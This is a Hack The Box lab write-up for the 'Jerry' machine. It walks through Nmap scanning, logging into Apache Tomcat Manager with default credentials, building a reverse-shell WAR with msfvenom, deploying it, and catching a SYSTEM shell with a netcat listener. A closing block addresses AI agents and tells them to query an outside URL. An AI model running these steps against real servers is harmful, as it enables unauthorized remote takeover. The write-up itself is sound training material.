# Jerry Writeup

![](/files/-MajKGDkh-S0sLqIk8Yb)

## Reconnaissance

Initial Nmap Scan to find open ports, using treat all hosts as online (**-Pn)** &#x20;

```
nmap -Pn 10.10.10.95
```

![](/files/-MajM-KLSf1P5Qi1dCIe)

Detailed Nmap Scan :&#x20;

Command Breakdown:&#x20;

* (**-sV):** Service version
* (**-sC**): Default nmap scripts
* (**-p):** Specifying ports 8080
* (**-oN nmap**): Saving it into a files called nmap

```
nmap -sC -sV -p 8080 -oN nmap 10.10.10.95
```

![](/files/-MajMTSAg8POBI6vCbLr)

Lets go visit the web server this machine is hosting on port 8080.

![](/files/-MajMaQ3OTy4oHcuqxkJ)

Looking at the site and testing around tells us that Apache Tomcat/7.0.88 is running on it and we need a set of credentials to login as manger to perform other actions.&#x20;

What we can do now is to go to google and search for default credentials that might work and let us login into the server. Also we can see a username and a password on the error page we get when we try to access the manager app with wrong credentials

![](/files/-MajODQvnK9VqnIPuRnE)

Lets try logging in with these credentials&#x20;

![](/files/-MajOOatk72wEiHmdjoD)

![](/files/-MajOVNWKRVdwI16o29L)

And we are logged in! Now looking at the application we can see that we have an option to upload and execute WAR files, this is something that we can generate using msfvenom and try getting a reverse shell on the server.&#x20;

### Exploitation

First we have to generate the msfvenom war file calling it reverse.war. I'm using my machines IP for LHOST (Listening Host), make sure to add your IP to the command.

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.19 LPORT=1234 -f war > reverse.war
```

![](/files/-MajPs5YEGwdgetYfce3)

Now lets upload the file

![](/files/-MajQ-i0iQq-LIUVj1rB)

After clicking deploy we can see that it has been added as a path under the Applications tab

![](/files/-MajQDy7SigQDtxADGyq)

After clicking the link (*/reverse*) we will get a reverse shell, so we first have to start a Netcat listener on our machine.

```
nc -lvnp 1234
```

![](/files/-MajQ_B-0kc6L1zgV-DZ)

Once we click the link, we get the reverse shell and as nt authority\system

![](/files/-MajQoCvX9aewkOr1kSb)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://writeups.adityadindi.com/hackthebox/linux-boxes-w-o-metasploit/jerry-writeup.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.